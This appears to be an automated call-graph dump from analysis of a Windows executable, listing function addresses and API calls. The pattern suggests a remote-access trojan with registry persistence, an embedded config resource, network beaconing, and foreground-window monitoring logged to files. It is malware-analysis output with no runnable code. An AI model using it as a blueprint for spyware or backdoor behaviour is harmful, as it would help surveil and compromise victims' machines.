3 API calls 93200->93206 93201->93200 93204 40d6a0 93207 40d6f5 93204->93207 93209 401e45 22 API calls 93204->93209 93205 40dd0f 93792 41239a 30 API calls 93205->93792 93215 40d63b 93206->93215 93208 401e45 22 API calls 93207->93208 93211 40d720 93208->93211 93216 40d6bf 93209->93216 93217 40d731 93211->93217 93218 40d72c 93211->93218 93212 40dd22 93793 410eda 65 API calls ___scrt_get_show_window_mode 93212->93793 93214 40dcfa 93220 402073 28 API calls 93214->93220 93246 40dd6a 93214->93246 93215->93188 93722 41239a 30 API calls 93215->93722 93216->93207 93224 40d6f7 93216->93224 93229 40d6db 93216->93229 93222 401e45 22 API calls 93217->93222 93726 40e501 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 93218->93726 93225 40dd3a 93220->93225 93232 40d73a 93222->93232 93788 4120e8 RegOpenKeyExA RegQueryValueExA RegCloseKey 93223->93788 93724 411eea RegOpenKeyExA RegQueryValueExA RegCloseKey 93224->93724 93619 4052dd 93225->93619 93228 40dd4a 93230 402073 28 API calls 93228->93230 93229->93207 93723 4067a0 36 API calls ___scrt_get_show_window_mode 93229->93723 93234 40dd59 93230->93234 93239 401e45 22 API calls 93232->93239 93237 4194da 79 API calls 93234->93237 93235 40d70d 93235->93207 93238 40d712 93235->93238 93236 40d9ec 93240 401e45 22 API calls 93236->93240 93241 40dd5e 93237->93241 93725 4066a6 58 API calls 93238->93725 93243 40d755 93239->93243 93244 40da10 93240->93244 93245 401fb8 11 API calls 93241->93245 93247 401e45 22 API calls 93243->93247 93518 402073 93244->93518 93245->93246 93621 413980 93246->93621 93249 40d76f 93247->93249 93253 401e45 22 API calls 93249->93253 93251 40dd6f 93252 40da22 93524 41215f RegCreateKeyA 93252->93524 93254 40d789 93253->93254 93259 401e45 22 API calls 93254->93259 93257 401e45 22 API calls 93258 40da44 93257->93258 93530 439867 93258->93530 93263 40d7a3 93259->93263 93262 40d810 93262->93223 93266 40d828 93262->93266 93302 40d8a7 ___scrt_get_show_window_mode 93262->93302 93263->93262 93265 401e45 22 API calls 93263->93265 93264 40da61 93789 41aa4f 81 API calls ___scrt_get_show_window_mode 93264->93789 93274 40d7b8 _wcslen 93265->93274 93268 401e45 22 API calls 93266->93268 93267 40da7e 93270 402073 28 API calls 93267->93270 93271 40d831 93268->93271 93273 40da8d 93270->93273 93278 401e45 22 API calls 93271->93278 93272 40da70 CreateThread 93272->93267 94468 41b212 10 API calls 93272->94468 93275 402073 28 API calls 93273->93275 93274->93262 93280 401e45 22 API calls 93274->93280 93276 40da9c 93275->93276 93534 4194da 93276->93534 93281 40d843 93278->93281 93283 40d7d3 93280->93283 93285 401e45 22 API calls 93281->93285 93282 401e45 22 API calls 93284 40daad 93282->93284 93286 401e45 22 API calls 93283->93286 93288 401e45 22 API calls 93284->93288 93287 40d855 93285->93287 93289 40d7e8 93286->93289 93291 401e45 22 API calls 93287->93291 93290 40dabf 93288->93290 93727 40c5ed 93289->93727 93294 401e45 22 API calls 93290->93294 93292 40d87e 93291->93292 93299 401e45 22 API calls 93292->93299 93296 40dad5 93294->93296 93303 401e45 22 API calls 93296->93303 93297 401ef3 28 API calls 93298 40d807 93297->93298 93300 401ee9 11 API calls 93298->93300 93301 40d88f 93299->93301 93300->93262 93785 40b871 46 API calls _wcslen 93301->93785 93508 412338 93302->93508 93304 40daf5 93303->93304 93309 439867 _strftime 39 API calls 93304->93309 93307 40d942 ctype 93312 401e45 22 API calls 93307->93312 93308 40d89f 93308->93302 93310 40db02 93309->93310 93311 401e45 22 API calls 93310->93311 93313 40db0d 93311->93313 93314 40d959 93312->93314 93315 401e45 22 API calls 93313->93315 93314->93236 93316 40d96d 93314->93316 93317 40db1e 93315->93317 93318 401e45 22 API calls 93316->93318 93558 408f1f 93317->93558 93319 40d976 93318->93319 93786 419bca 28 API calls 93319->93786 93321 40d982 93787 40de34 88 API calls 93321->93787 93325 40d987 93325->93194 93325->93236 93326 401e45 22 API calls 93327 40db3c 93326->93327 93328 40db83 93327->93328 93329 40db4a 93327->93329 93331 401e45 22 API calls 93328->93331 93330 43229f new 22 API calls 93329->93330 93332 40db53 93330->93332 93333 40db91 93331->93333 93334 401e45 22 API calls 93332->93334 93336 40dbd9 93333->93336 93337 40db9c 93333->93337 93335 40db65 93334->93335 93340 40db6c CreateThread 93335->93340 93339 401e45 22 API calls 93336->93339 93338 43229f new 22 API calls 93337->93338 93341 40dba5 93338->93341 93342 40dbe2 93339->93342 93340->93328 94470 417f6a 101 API calls 2 library calls 93340->94470 93343 401e45 22 API calls 93341->93343 93345 40dc4c 93342->93345 93346 40dbed 93342->93346 93344 40dbb6 93343->93344 93347 40dbbd CreateThread 93344->93347 93348 401e45 22 API calls 93345->93348 93349 401e45 22 API calls 93346->93349 93347->93336 94467 417f6a 101 API calls 2 library calls 93347->94467 93350 40dc55 93348->93350 93351 40dbfc 93349->93351 93353 40dc60 93350->93353 93354 40dc99 93350->93354 93352 401e45 22 API calls 93351->93352 93356 40dc11 93352->93356 93355 401e45 22 API calls 93353->93355 93595 4195f8 93354->93595 93358 40dc69 93355->93358 93790 40c5a1 31 API calls 93356->93790 93364 401e45 22 API calls 93358->93364 93367 40dc7e 93364->93367 93365 40dc24 93368 401ef3 28 API calls 93365->93368 93376 439867 _strftime 39 API calls 93367->93376 93371 40dc30 93368->93371 93369 40dcc1 SetProcessDEPPolicy 93370 40dcc4 CreateThread 93369->93370 93372 40dce5 93370->93372 93373 40dcd9 CreateThread 93370->93373 94439 40e18d 93370->94439 93374 401ee9 11 API calls 93371->93374 93372->93214 93375 40dcee CreateThread 93372->93375 93373->93372 94469 410b5c 137 API calls 93373->94469 93377 40dc39 CreateThread 93374->93377 93375->93214 94471 411140 38 API calls ___scrt_get_show_window_mode 93375->94471 93378 40dc8b 93376->93378 93377->93345 94466 401bc9 49 API calls _strftime 93377->94466 93791 40b0a3 7 API calls 93378->93791 93380->93086 93381->93090 93382->93094 93383->93099 93388->93113 93389->93115 93390->93118 93391->93120 93393 4328dc GetStartupInfoW 93392->93393 93393->93124 93395 44c24b 93394->93395 93396 44c242 93394->93396 93395->93127 93399 44c138 48 API calls 5 library calls 93396->93399 93398->93127 93399->93395 93401 41a919 LoadLibraryA GetProcAddress 93400->93401 93402 41a909 GetModuleHandleA GetProcAddress 93400->93402 93403 41a947 GetModuleHandleA GetProcAddress 93401->93403 93404 41a937 GetModuleHandleA GetProcAddress 93401->93404 93402->93401 93405 41a973 24 API calls 93403->93405 93406 41a95f GetModuleHandleA GetProcAddress 93403->93406 93404->93403 93405->93132 93406->93405 93794 419493 FindResourceA 93407->93794 93410 439adb _Yarn 21 API calls 93411 40ddad ctype 93410->93411 93797 402097 93411->93797 93414 401fc2 28 API calls 93415 40ddd3 93414->93415 93416 401fb8 11 API calls 93415->93416 93417 40dddc 93416->93417 93418 439adb _Yarn 21 API calls 93417->93418 93419 40dded ctype 93418->93419 93803 4062ee 93419->93803 93421 40de20 93421->93134 93423 4020ec 93422->93423 93424 4023ae 11 API calls 93423->93424 93425 402106 93424->93425 93426 402549 28 API calls 93425->93426 93427 402114 93426->93427 93427->93137 93855 4020bf 93428->93855 93430 419e0a 93431 401fb8 11 API calls 93430->93431 93432 419e3c 93431->93432 93434 401fb8 11 API calls 93432->93434 93433 419e0c 93871 404182 28 API calls 93433->93871 93436 419e44 93434->93436 93439 401fb8 11 API calls 93436->93439 93438 419e18 93440 401fc2 28 API calls 93438->93440 93442 40d43c 93439->93442 93443 419e21 93440->93443 93441 401fc2 28 API calls 93449 419d9a 93441->93449 93450 40e563 93442->93450 93444 401fb8 11 API calls 93443->93444 93446 419e29 93444->93446 93445 401fb8 11 API calls 93445->93449 93447 41ab9a 28 API calls 93446->93447 93447->93430 93449->93430 93449->93433 93449->93441 93449->93445 93859 404182 28 API calls 93449->93859 93860 41ab9a 93449->93860 93451 40e56f 93450->93451 93453 40e576 93450->93453 93886 402143 11 API calls 93451->93886 93453->93142 93455 402143 93454->93455 93459 40217f 93455->93459 93887 402710 11 API calls 93455->93887 93457 402164 93888 4026f2 11 API calls std::_Deallocate 93457->93888 93459->93144 93461 401e4d 93460->93461 93462 401e55 93461->93462 93889 402138 22 API calls 93461->93889 93462->93149 93466 4020bf 11 API calls 93465->93466 93467 40530a 93466->93467 93890 403280 93467->93890 93469 405326 93469->93157 93894 4051cf 93470->93894 93472 408217 93898 402035 93472->93898 93475 401fc2 93476 401fd1 93475->93476 93477 402019 93475->93477 93478 4023ae 11 API calls 93476->93478 93484 401fb8 93477->93484 93479 401fda 93478->93479 93480 40201c 93479->93480 93481 401ff5 93479->93481 93482 40265a 11 API calls 93480->93482 93930 403078 28 API calls 93481->93930 93482->93477 93485 4023ae 11 API calls 93484->93485 93486 401fc1 93485->93486 93486->93171 93488 401fb2 93487->93488 93489 401fa9 93487->93489 93488->93176 93931 4025c0 28 API calls 93489->93931 93932 419f23 93491->93932 93496 401fc2 28 API calls 93497 4192ea 93496->93497 93498 401fb8 11 API calls 93497->93498 93499 4192f2 93498->93499 93500 419348 93499->93500 93501 411f91 31 API calls 93499->93501 93500->93204 93502 41931b 93501->93502 93503 419326 StrToIntA 93502->93503 93504 41933d 93503->93504 93505 419334 93503->93505 93507 401fb8 11 API calls 93504->93507 93940 41accf 22 API calls 93505->93940 93507->93500 93509 412356 93508->93509 93510 4062ee 28 API calls 93509->93510 93511 41236b 93510->93511 93512 4020d6 28 API calls 93511->93512 93513 41237b 93512->93513 93514 41215f 14 API calls 93513->93514 93515 412385 93514->93515 93516 401fb8 11 API calls 93515->93516 93517 412392 93516->93517 93517->93307 93519 40207b 93518->93519 93520 4023ae 11 API calls 93519->93520 93521 402086 93520->93521 93941 4024cd 93521->93941 93525 4121af 93524->93525 93527 412178 93524->93527 93526 401fb8 11 API calls 93525->93526 93528 40da38 93526->93528 93529 41218a RegSetValueExA RegCloseKey 93527->93529 93528->93257 93529->93525 93531 439880 _strftime 93530->93531 93945 438bbe 93531->93945 93533 40da51 93533->93264 93533->93267 93535 4194f0 GetLocalTime 93534->93535 93536 41958b 93534->93536 93537 4052fe 28 API calls 93535->93537 93538 401fb8 11 API calls 93536->93538 93539 419532 93537->93539 93540 419593 93538->93540 93541 408209 28 API calls 93539->93541 93542 401fb8 11 API calls 93540->93542 93543 41953e 93541->93543 93544 40daa1 93542->93544 93973 402ef0 93543->93973 93544->93282 93547 408209 28 API calls 93548 419556 93547->93548 93978 41928b 76 API calls 93548->93978 93550 419564 93551 401fb8 11 API calls 93550->93551 93552 419570 93551->93552 93553 401fb8 11 API calls 93552->93553 93554 419579 93553->93554 93555 401fb8 11 API calls 93554->93555 93556 419582 93555->93556 93557 401fb8 11 API calls 93556->93557 93557->93536 93982 401f66 93558->93982 93560 408f36 _wcslen 93561 408f60 93560->93561 93562 408f49 93560->93562 93563 40c5ed 31 API calls 93561->93563 93564 40c5ed 31 API calls 93562->93564 93566 408f68 93563->93566 93565 408f51 93564->93565 93567 401ef3 28 API calls 93565->93567 93568 401ef3 28 API calls 93566->93568 93594 408f5b 93567->93594 93569 408f76 93568->93569 93570 401ee9 11 API calls 93569->93570 93572 408f7e 93570->93572 93571 401ee9 11 API calls 93573 408fb5 93571->93573 94014 4081c7 28 API calls 93572->94014 93575 408ffb 93573->93575 93576 408fdc 93573->93576 93986 408098 93575->93986 93578 408fe1 93576->93578 93579 409013 93576->93579 93577 408f90 94015 402ff4 93577->94015 93583 408098 28 API calls 93578->93583 93582 401ee9 11 API calls 93579->93582 93586 40901b 93582->93586 93587 408fef 93583->93587 93586->93326 94020 4092ba 29 API calls 93587->94020 93589 401ef3 28 API calls 93591 408fa5 93589->93591 93592 401ee9 11 API calls 93591->93592 93592->93594 93593 408ff9 93593->93579 93594->93571 93596 41961b GetUserNameW 93595->93596 94194 40415e 93596->94194 93601 402ff4 28 API calls 93602 41965d 93601->93602 93603 401ee9 11 API calls 93602->93603 93604 419666 93603->93604 93605 401ee9 11 API calls 93604->93605 93606 40dca2 93605->93606 93607 401ef3 93606->93607 93608 401f02 93607->93608 93615 401f4a 93607->93615 93609 402232 11 API calls 93608->93609 93610 401f0b 93609->93610 93611 401f26 93610->93611 93612 401f4d 93610->93612 94288 40303c 28 API calls 93611->94288 93613 402316 11 API calls 93612->93613 93613->93615 93616 401ee9 93615->93616 93617 402232 11 API calls 93616->93617 93618 401ef2 93617->93618 93618->93369 93618->93370 94289 40533f 28 API calls 93619->94289 93622 4020bf 11 API calls 93621->93622 93623 413994 93622->93623 94290 419894 93623->94290 93626 4020bf 11 API calls 93627 4139aa 93626->93627 93628 401e45 22 API calls 93627->93628 93629 4139b8 93628->93629 93630 439867 _strftime 39 API calls 93629->93630 93631 4139c5 93630->93631 93632 4139d7 93631->93632 93633 4139ca Sleep 93631->93633 93634 402073 28 API calls 93632->93634 93633->93632 93635 4139e6 93634->93635 93636 401e45 22 API calls 93635->93636 93637 4139ef 93636->93637 93638 4020d6 28 API calls 93637->93638 93639 4139fa 93638->93639 93640 419d87 28 API calls 93639->93640 93641 413a02 93640->93641 94294 40487e WSAStartup 93641->94294 93643 413a0c 93644 401e45 22 API calls 93643->93644 93645 413a15 93644->93645 93646 401e45 22 API calls 93645->93646 93671 413a94 93645->93671 93647 413a2e 93646->93647 93648 401e45 22 API calls 93647->93648 93649 413a3f 93648->93649 93651 401e45 22 API calls 93649->93651 93650 419d87 28 API calls 93650->93671 93652 413a50 93651->93652 93654 401e45 22 API calls 93652->93654 93653 40822a 28 API calls 93653->93671 93655 413a61 93654->93655 93657 401e45 22 API calls 93655->93657 93656 402ef0 28 API calls 93656->93671 93659 413a72 93657->93659 93658 401fc2 28 API calls 93658->93671 93660 401e45 22 API calls 93659->93660 93661 413a84 93660->93661 94396 40471d 88 API calls 93661->94396 93662 401e45 22 API calls 93662->93671 93665 413be2 WSAGetLastError 94397 41a86b 30 API calls 93665->94397 93668 4052dd 28 API calls 93668->93671 93670 402073 28 API calls 93670->93671 93671->93650 93671->93653 93671->93656 93671->93658 93671->93662 93671->93665 93671->93668 93671->93670 93674 401fb8 11 API calls 93671->93674 93675 4052fe 28 API calls 93671->93675 93676 401e6d 11 API calls 93671->93676 93677 408209 28 API calls 93671->93677 93678 439867 _strftime 39 API calls 93671->93678 93680 4194da 79 API calls 93671->93680 93682 408098 28 API calls 93671->93682 93684 4020d6 28 API calls 93671->93684 93686 411f91 31 API calls 93671->93686 93709 413e11 93671->93709 94295 41393f 93671->94295 94300 40480d 93671->94300 94307 404f31 93671->94307 94322 4048a8 connect 93671->94322 94382 404e06 WaitForSingleObject 93671->94382 94398 413013 50 API calls 93671->94398 94399 43f34f 20 API calls 93671->94399 94400 4120e8 RegOpenKeyExA RegQueryValueExA RegCloseKey 93671->94400 93674->93671 93675->93671 93676->93671 93677->93671 93679 4144bf Sleep 93678->93679 93679->93671 93680->93671 93682->93671 93684->93671 93686->93671 93687 40415e 28 API calls 93687->93709 93688 401e45 22 API calls 93689 413e7b GetTickCount 93688->93689 94401 419b16 28 API calls 93689->94401 93692 419b16 28 API calls 93692->93709 93694 419c8a 28 API calls 93694->93709 93697 408209 28 API calls 93697->93709 93698 402e81 28 API calls 93698->93709 93700 402ef0 28 API calls 93700->93709 93702 401fb8 11 API calls 93702->93709 93703 401ee9 11 API calls 93703->93709 93706 402073 28 API calls 93706->93709 93707 4194da 79 API calls 93707->93709 93708 414461 CreateThread 93708->93709 94432 418ccd 103 API calls 93708->94432 93709->93671 93709->93687 93709->93688 93709->93692 93709->93694 93709->93697 93709->93698 93709->93700 93709->93702 93709->93703 93709->93706 93709->93707 93709->93708 94402 419ac6 GetTickCount 93709->94402 94403 419a77 30 API calls ___scrt_get_show_window_mode 93709->94403 94404 40e2bb 29 API calls 93709->94404 94405 402f11 28 API calls 93709->94405 94406 40826c 28 API calls 93709->94406 94407 404a81 60 API calls ctype 93709->94407 94408 404bf0 112 API calls _Yarn 93709->94408 94409 409f9a 84 API calls 93709->94409 93710->93150 93711->93158 93712->93162 93715 4020bf 11 API calls 93714->93715 93716 408236 93715->93716 93717 403280 28 API calls 93716->93717 93718 408253 93717->93718 93718->93184 93720 40d5c5 93719->93720 93721 411f5e RegQueryValueExA RegCloseKey 93719->93721 93720->93181 93720->93205 93721->93720 93722->93188 93723->93207 93724->93235 93725->93207 93726->93217 93728 401f66 11 API calls 93727->93728 93729 40c609 93728->93729 93730 40c629 93729->93730 93731 40c65e 93729->93731 93733 40c61f 93729->93733 94433 41959f 29 API calls 93730->94433 93732 419f23 GetCurrentProcess 93731->93732 93736 40c663 93732->93736 93735 40c752 GetLongPathNameW 93733->93735 93738 40415e 28 API calls 93735->93738 93739 40c667 93736->93739 93740 40c6b9 93736->93740 93737 40c632 93741 401ef3 28 API calls 93737->93741 93742 40c767 93738->93742 93745 40415e 28 API calls 93739->93745 93744 40415e 28 API calls 93740->93744 93780 40c63c 93741->93780 93743 40415e 28 API calls 93742->93743 93746 40c776 93743->93746 93747 40c6c7 93744->93747 93748 40c675 93745->93748 94436 40c7f9 28 API calls 93746->94436 93753 40415e 28 API calls 93747->93753 93754 40415e 28 API calls 93748->93754 93750 401ee9 11 API calls 93750->93733 93751 40c789 94437 402f85 28 API calls 93751->94437 93756 40c6dd 93753->93756 93757 40c68b 93754->93757 93755 40c794 94438 402f85 28 API calls 93755->94438 94435 402f85 28 API calls 93756->94435 94434 402f85 28 API calls 93757->94434 93761 40c79e 93764 401ee9 11 API calls 93761->93764 93762 40c6e8 93765 401ef3 28 API calls 93762->93765 93763 40c696 93766 401ef3 28 API calls 93763->93766 93767 40c7a8 93764->93767 93768 40c6f3 93765->93768 93769 40c6a1 93766->93769 93770 401ee9 11 API calls 93767->93770 93771 401ee9 11 API calls 93768->93771 93772 401ee9 11 API calls 93769->93772 93773 40c7b1 93770->93773 93774 40c6fc 93771->93774 93775 40c6aa 93772->93775 93776 401ee9 11 API calls 93773->93776 93777 401ee9 11 API calls 93774->93777 93778 401ee9 11 API calls 93775->93778 93779 40c7ba 93776->93779 93777->93780 93778->93780 93781 401ee9 11 API calls 93779->93781 93780->93750 93782 40c7c3 93781->93782 93783 401ee9 11 API calls 93782->93783 93784 40c7cc 93783->93784 93784->93297 93785->93308 93786->93321 93787->93325 93788->93236 93789->93272 93790->93365 93791->93354 93792->93212 93795 4194b0 LoadResource LockResource SizeofResource 93794->93795 93796 40dd9e 93794->93796 93795->93796 93796->93410 93798 40209f 93797->93798 93806 4023ae 93798->93806 93800 4020aa 93810 4024ea 93800->93810 93802 4020b9 93802->93414 93804 402097 28 API calls 93803->93804 93805 406302 93804->93805 93805->93421 93807 402408 93806->93807 93808 4023b8 93806->93808 93807->93800 93808->93807 93817 402787 11 API calls std::_Deallocate 93808->93817 93811 4024fa 93810->93811 93812 402500 93811->93812 93813 402515 93811->93813 93818 402549 93812->93818 93828 4028c8 93813->93828 93816 402513 93816->93802 93817->93807 93839 402868 93818->93839 93820 40255d 93821 402572 93820->93821 93822 402587 93820->93822 93844 402a14 22 API calls 93821->93844 93824 4028c8 28 API calls 93822->93824 93827 402585 93824->93827 93825 40257b 93845 4029ba 22 API calls 93825->93845 93827->93816 93829 4028d1 93828->93829 93830 402933 93829->93830 93832 4028db 93829->93832 93853 402884 22 API calls 93830->93853 93834 4028e4 93832->93834 93835 4028f7 93832->93835 93847 402c8e 93834->93847 93837 4028f5 93835->93837 93838 4023ae 11 API calls 93835->93838 93837->93816 93838->93837 93840 402870 93839->93840 93841 402878 93840->93841 93846 402c83 22 API calls 93840->93846 93841->93820 93844->93825 93845->93827 93848 402c98 __EH_prolog 93847->93848 93854 402e34 22 API calls 93848->93854 93850 4023ae 11 API calls 93852 402d72 93850->93852 93851 402d04 93851->93850 93852->93837 93854->93851 93856 4020c7 93855->93856 93857 4023ae 11 API calls 93856->93857 93858 4020d2 93857->93858 93858->93449 93859->93449 93861 41aba7 93860->93861 93862 41ac06 93861->93862 93866 41abb7 93861->93866 93863 41ac20 93862->93863 93877 41ad46 28 API calls 93862->93877 93865 41aec3 28 API calls 93863->93865 93868 41ac02 93865->93868 93867 41abef 93866->93867 93872 41ad46 28 API calls 93866->93872 93873 41aec3 93867->93873 93868->93449 93871->93438 93872->93867 93874 41aecc 93873->93874 93878 41af80 93874->93878 93877->93863 93879 41af89 93878->93879 93882 41b055 93879->93882 93884 41b060 93882->93884 93883 41aed6 93883->93868 93884->93883 93885 4020d6 28 API calls 93884->93885 93885->93883 93886->93453 93887->93457 93888->93459 93892 40328a 93890->93892 93891 4032a9 93891->93469 93892->93891 93893 4028c8 28 API calls 93892->93893 93893->93891 93895 4051db 93894->93895 93904 405254 93895->93904 93897 4051e8 93897->93472 93899 402041 93898->93899 93900 4023ae 11 API calls 93899->93900 93901 40205b 93900->93901 93926 40265a 93901->93926 93905 405262 93904->93905 93906 405268 93905->93906 93907 40527e 93905->93907 93915 4025d0 93906->93915 93909 4052d5 93907->93909 93911 405296 93907->93911 93924 402884 22 API calls 93909->93924 93913 4028c8 28 API calls 93911->93913 93914 40527c 93911->93914 93913->93914 93914->93897 93916 402868 22 API calls 93915->93916 93917 4025e2 93916->93917 93918 402652 93917->93918 93919 402609 93917->93919 93925 402884 22 API calls 93918->93925 93922 4028c8 28 API calls 93919->93922 93923 40261b 93919->93923 93922->93923 93923->93914 93927 40266b 93926->93927 93928 4023ae 11 API calls 93927->93928 93929 40206d 93928->93929 93929->93475 93930->93477 93931->93488 93933 419f30 GetCurrentProcess 93932->93933 93934 4192bc 93932->93934 93933->93934 93935 411f91 RegOpenKeyExA 93934->93935 93936 411fbf RegQueryValueExA RegCloseKey 93935->93936 93937 411fe9 93935->93937 93936->93937 93938 402073 28 API calls 93937->93938 93939 411ffe 93938->93939 93939->93496 93940->93504 93942 4024d9 93941->93942 93943 4024ea 28 API calls 93942->93943 93944 402091 93943->93944 93944->93252 93961 4397c5 93945->93961 93947 438c0b 93967 438557 35 API calls 3 library calls 93947->93967 93949 438bd0 93949->93947 93950 438be5 93949->93950 93952 438bea ___std_exception_copy 93949->93952 93966 43ad91 20 API calls __dosmaperr 93950->93966 93952->93533 93954 438c17 93955 438c46 93954->93955 93968 43980a 39 API calls __Toupper 93954->93968 93958 438cb2 93955->93958 93969 439771 20 API calls 2 library calls 93955->93969 93970 439771 20 API calls 2 library calls 93958->93970 93959 438d79 _strftime 93959->93952 93971 43ad91 20 API calls __dosmaperr 93959->93971 93962 4397ca 93961->93962 93963 4397dd 93961->93963 93972 43ad91 20 API calls __dosmaperr 93962->93972 93963->93949 93965 4397cf ___std_exception_copy 93965->93949 93966->93952 93967->93954 93968->93954 93969->93958 93970->93959 93971->93952 93972->93965 93979 401f90 93973->93979 93975 402efe 93976 402035 11 API calls 93975->93976 93977 402f0d 93976->93977 93977->93547 93978->93550 93980 4025d0 28 API calls 93979->93980 93981 401f9d 93980->93981 93981->93975 93983 401f6e 93982->93983 94021 402232 93983->94021 93985 401f79 93985->93560 93987 4080ae 93986->93987 93988 402232 11 API calls 93987->93988 93989 4080c8 93988->93989 94026 404247 93989->94026 93991 4080d6 93992 409203 93991->93992 94051 40a83c 93992->94051 93995 409257 93998 402073 28 API calls 93995->93998 93996 40922f 93997 402073 28 API calls 93996->93997 93999 409239 93997->93999 94000 409262 93998->94000 94055 419bca 28 API calls 93999->94055 94002 402073 28 API calls 94000->94002 94004 409271 94002->94004 94003 409247 94056 40a0b0 31 API calls _Yarn 94003->94056 94006 4194da 79 API calls 94004->94006 94008 409276 CreateThread 94006->94008 94007 40924e 94011 401fb8 11 API calls 94007->94011 94009 409291 CreateThread 94008->94009 94010 40929d CreateThread 94008->94010 94061 409305 94008->94061 94009->94010 94064 4092ef 94009->94064 94012 401ee9 11 API calls 94010->94012 94058 409311 94010->94058 94011->93995 94013 4092b1 94012->94013 94013->93579 94014->93577 94166 403202 94015->94166 94017 403002 94170 403242 94017->94170 94020->93593 94193 4092fb 159 API calls 94020->94193 94022 40228c 94021->94022 94023 40223c 94021->94023 94022->93985 94023->94022 94025 402759 11 API calls std::_Deallocate 94023->94025 94025->94022 94027 402868 22 API calls 94026->94027 94028 40425b 94027->94028 94029 404270 94028->94029 94030 404285 94028->94030 94036 4042bf 22 API calls 94029->94036 94038 4027c6 94030->94038 94033 404279 94037 402c28 22 API calls 94033->94037 94035 404283 94035->93991 94036->94033 94037->94035 94039 4027cf 94038->94039 94040 402831 94039->94040 94041 4027d9 94039->94041 94050 402884 22 API calls 94040->94050 94044 4027e2 94041->94044 94045 4027f5 94041->94045 94049 402aca 28 API calls __EH_prolog 94044->94049 94047 4027f3 94045->94047 94048 402232 11 API calls 94045->94048 94047->94035 94048->94047 94049->94047 94052 40a845 94051->94052 94053 409221 94051->94053 94057 40a8bc 28 API calls 94052->94057 94053->93995 94053->93996 94055->94003 94056->94007 94057->94053 94067 409c1f 94058->94067 94120 40971e 94061->94120 94165 409340 84 API calls 94064->94165 94066 4092f8 94074 409c2d 94067->94074 94068 409c87 Sleep GetForegroundWindow GetWindowTextLengthW 94097 40a854 94068->94097 94069 40931a 94072 401f66 11 API calls 94072->94074 94074->94068 94074->94069 94074->94072 94077 409ccd GetWindowTextW 94074->94077 94096 409ce7 94074->94096 94103 43219b EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 94074->94103 94104 432525 23 API calls __onexit 94074->94104 94105 43215c SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 94074->94105 94076 419ac6 GetTickCount 94076->94096 94077->94074 94079 40a83c 28 API calls 94079->94096 94080 409e25 94081 401ee9 11 API calls 94080->94081 94081->94069 94082 409d92 Sleep 94082->94096 94085 402073 28 API calls 94085->94096 94086 4052dd 28 API calls 94086->94096 94087 408098 28 API calls 94087->94096 94089 402ff4 28 API calls 94089->94096 94090 408209 28 API calls 94090->94096 94092 40962e 12 API calls 94092->94096 94094 401ee9 11 API calls 94094->94096 94095 401fb8 11 API calls 94095->94096 94096->94074 94096->94076 94096->94079 94096->94080 94096->94082 94096->94085 94096->94086 94096->94087 94096->94089 94096->94090 94096->94092 94096->94094 94096->94095 94106 408080 28 API calls 94096->94106 94107 40a0b0 31 API calls _Yarn 94096->94107 94108 40a8cc 28 API calls 94096->94108 94109 40a694 40 API calls 2 library calls 94096->94109 94110 43f34f 20 API calls 94096->94110 94111 419bca 28 API calls 94096->94111 94098 40a85c 94097->94098 94099 402232 11 API calls 94098->94099 94100 40a867 94099->94100 94112 40a87c 94100->94112 94102 40a876 94102->94074 94104->94074 94105->94074 94106->94096 94107->94096 94108->94096 94109->94096 94110->94096 94111->94096 94113 40a8b6 94112->94113 94114 40a888 94112->94114 94119 402884 22 API calls 94113->94119 94115 4027c6 28 API calls 94114->94115 94118 40a892 94115->94118 94118->94102 94121 409733 Sleep 94120->94121 94139 40966d 94121->94139 94123 40930e 94124 409773 CreateDirectoryW 94128 409745 94124->94128 94125 409784 GetFileAttributesW 94125->94128 94127 409815 PathFileExistsW 94137 4097e6 94127->94137 94128->94121 94128->94123 94128->94124 94128->94125 94129 401e45 22 API calls 94128->94129 94128->94137 94152 41a17b 94128->94152 94129->94128 94130 4020bf 11 API calls 94130->94137 94132 402097 28 API calls 94132->94137 94133 4062ee 28 API calls 94133->94137 94134 401fc2 28 API calls 94134->94137 94135 401fb8 11 API calls 94135->94137 94137->94127 94137->94130 94137->94132 94137->94133 94137->94134 94137->94135 94138 401fb8 11 API calls 94137->94138 94162 41a20f 32 API calls 94137->94162 94163 41a27c CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 94137->94163 94138->94128 94140 40971a 94139->94140 94143 409683 94139->94143 94140->94128 94141 4096a2 CreateFileW 94142 4096b0 GetFileSize 94141->94142 94141->94143 94142->94143 94144 4096e5 CloseHandle 94142->94144 94143->94141 94143->94144 94145 4096f7 94143->94145 94146 4096d3 94143->94146 94147 4096da Sleep 94143->94147 94144->94143 94145->94140 94149 408098 28 API calls 94145->94149 94164 40a025 83 API calls 94146->94164 94147->94144 94150 409713 94149->94150 94151 409203 120 API calls 94150->94151 94151->94140 94153 41a18e CreateFileW 94152->94153 94155 41a1c7 94153->94155 94156 41a1cb 94153->94156 94155->94128 94157 41a1d2 SetFilePointer 94156->94157 94158 41a1eb WriteFile 94156->94158 94157->94158 94161 41a1e2 CloseHandle 94157->94161 94159 41a200 CloseHandle 94158->94159 94160 41a1fe 94158->94160 94159->94155 94160->94159 94161->94155 94162->94137 94163->94137 94164->94147 94165->94066 94167 40320e 94166->94167 94176 4035f8 94167->94176 94169 40321b 94169->94017 94171 40324e 94170->94171 94172 402232 11 API calls 94171->94172 94173 403268 94172->94173 94189 402316 94173->94189 94177 403606 94176->94177 94178 403624 94177->94178 94179 40360c 94177->94179 94181 40363c 94178->94181 94182 40367e 94178->94182 94187 403686 28 API calls 94179->94187 94185 4027c6 28 API calls 94181->94185 94186 403622 94181->94186 94188 402884 22 API calls 94182->94188 94185->94186 94186->94169 94187->94186 94190 402327 94189->94190 94191 402232 11 API calls 94190->94191 94192 4023a7 94191->94192 94192->93589 94195 404166 94194->94195 94196 402232 11 API calls 94195->94196 94197 404171 94196->94197 94205 40419c 94197->94205 94200 4042dc 94216 404333 94200->94216 94202 4042ea 94203 403242 11 API calls 94202->94203 94204 4042f9 94203->94204 94204->93601 94206 4041a8 94205->94206 94209 4041b9 94206->94209 94208 40417c 94208->94200 94210 4041c9 94209->94210 94211 4041e6 94210->94211 94212 4041cf 94210->94212 94213 4027c6 28 API calls 94211->94213 94214 404247 28 API calls 94212->94214 94215 4041e4 94213->94215 94214->94215 94215->94208 94217 40433f 94216->94217 94220 404351 94217->94220 94219 40434d 94219->94202 94221 40435f 94220->94221 94222 404365 94221->94222 94223 40437e 